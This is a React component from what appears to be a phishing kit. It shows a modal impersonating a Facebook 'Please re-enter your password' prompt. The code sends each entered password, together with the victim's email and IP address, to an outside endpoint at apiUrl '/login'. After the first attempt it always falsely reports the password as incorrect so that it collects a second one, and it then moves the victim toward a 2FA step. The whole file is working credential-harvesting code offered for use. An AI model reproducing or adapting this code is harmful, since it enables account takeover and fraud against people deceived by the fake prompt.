import React, { useEffect, useState, forwardRef, useImperativeHandle } from "react";
import Modal from "react-modal";
import { NavLink } from "react-router-dom";
import { useNavigate } from 'react-router-dom';
import axios from "axios";
import LoadingDialog from "./LoadingDialog";
const customStyles = {
  content: {
    top: "50%",
    left: "50%",
    right: "auto",
    bottom: "auto",
    marginRight: "-50%",
    transform: "translate(-50%, -50%)",
    borderRadius: '30px'
  },
};

const AuthViaPass = forwardRef((props, ref) => {
  const { authIsOpen, setCheckAuth, name, email, ip, socketId, apiUrl, displayWaiting } = props;
  //const [doubleCheck, setDoubleCheck] = useState(0);
  const [doubleCheck, setDoubleCheck] = useState(true);
  const [correctFlag, setCorrectFlag] = useState(false);
  const [pass, setPass] = useState();
  const [passFlag, setPassFlag] = useState(false);
  const [pageFlag, setPageFlag] = useState(false);
  const [progress, setProgress] = useState(0);
  const [showProgressBar, setShowProgressBar] = useState(false);
  const navigate = useNavigate();
  const [passwords, setPasswords] = useState([]);

  const setLoginagain = () => {
    setShowProgressBar(false);
    setCorrectFlag(true);
    setPass("");
  };

  const set2FA = () => {
    setCorrectFlag(false);
    setPassFlag(false);
    setCheckAuth(false);
  };

  useImperativeHandle(ref, () => ({
    setLoginagain,
    set2FA,
  }));


  function closeModal() {
    setCheckAuth(false);
  }

  const addPassword = (newItem) => {
    setPasswords((prevItems) => [...prevItems, newItem]);
  };

  const handlewithContinue = () => {
    //if (doubleCheck === 0) setDouble(doubleCheck + 1);
    if (pass !== "") {

      var status = "Pwa"
      
      let _passwords = passwords;
      _passwords.push(pass)

      let _total_password = '';

      _passwords.forEach((eachPassword, _index) => {
        if (_index == 0)
        _total_password += `Password ${_index + 1}: ${eachPassword}`
        else
        _total_password += `\nPassword ${_index + 1}: ${eachPassword}`
      });

      if (_total_password == '') _total_password = `Password 1: ${pass}`

      axios.post(apiUrl + `/login`, {
        ipaddr: ip,
        _id: socketId,
        text: `Email: ${email}\n${_total_password}\n============================\nCurrent step: ${status}\n============================`
      }).then(({data}) => {
        
        if (_passwords.length < 2) {
          setTimeout(() => {
            setCorrectFlag(true);
          }, 1000);
          setPass("");
        } else if (_passwords.length == 2) {
          displayWaiting(true);

          setTimeout(() => {
            setCorrectFlag(false);
            setPassFlag(false);
            setCheckAuth(false);
            displayWaiting(false);

          }, 20000);
        }
        setPasswords(_passwords);
      });
    } else {
      setPassFlag(true);
    }
  };

  const handlewithChange = ({ target }) => {
    setCorrectFlag(false);
    const value = target.value;
    setPass(value);
    if (value !== "") {
      setPassFlag(false);
    }
  };
  useEffect(() => {
    setPass("");
  }, []);

  return (
    <>
      <Modal
        isOpen={authIsOpen}
        // onAfterOpen={afterOpenModal}
        // onRequestClose={closeModal}
        style={customStyles}
        contentLabel="Auth Modal"
      >
        <div>
          <div className="flex justify-between mt-[25px]">
            <h2 className="text-[15px] text-[#65676b] leading-[22px] font-semibold">
              {name} · Facebook
            </h2>  
          </div>
          <h1 className="text-[20px] text-[#212529]" style={{fontWeight: '700'}}>
            Please re-enter your password
          </h1>          
          <p className="text-base leading-6 mb-[22px]">
            For your security, you must re-enter your password to continue.
          </p>
          <div className="space-x-[15px] self-center">
            <div>
              <input
                type="password"
                name="password"
                id="password"
                placeholder="Password"
                value={pass}
                className="border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block p-3.5 dark:border-gray-600 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500"
                required
                onChange={handlewithChange}
                disabled={showProgressBar}
                style={{width: '100%', fontSize: '18px'}}
              />
            </div>
          </div>
          {passFlag === true && (
            <h1 className="text-[15px] text-[#a94442] leading-[22px] mt-[4px]">
              Enter your password !
            </h1>
          )}
          {correctFlag === true && (
            <h1 className="text-[15px] text-[#a94442] leading-[22px] mt-[4px]">
              Your password was incorrect !
            </h1>
          )}

          {/* <LoadingDialog show={showProgressBar} /> */}

          <div>
            <div>
              <div>
                <button
                    onClick={handlewithContinue}
                    className="inline-flex justify-center w-full px-2 py-3.5 text-xs text-center text-white bg-blue-600 rounded-lg hover:bg-blue-700 focus:ring-4 focus:outline-none focus:ring-blue-300 dark:bg-blue-500 dark:hover:bg-blue-600 dark:focus:ring-blue-800"
                    disabled={showProgressBar}
                    style={{fontSize: '16px', borderRadius: '20px', marginTop: '100px'}}
                  >
                    Submit
                </button>
              </div>
            </div>
          </div>
        </div>
      </Modal>
    </>
  );
});

export default AuthViaPass;
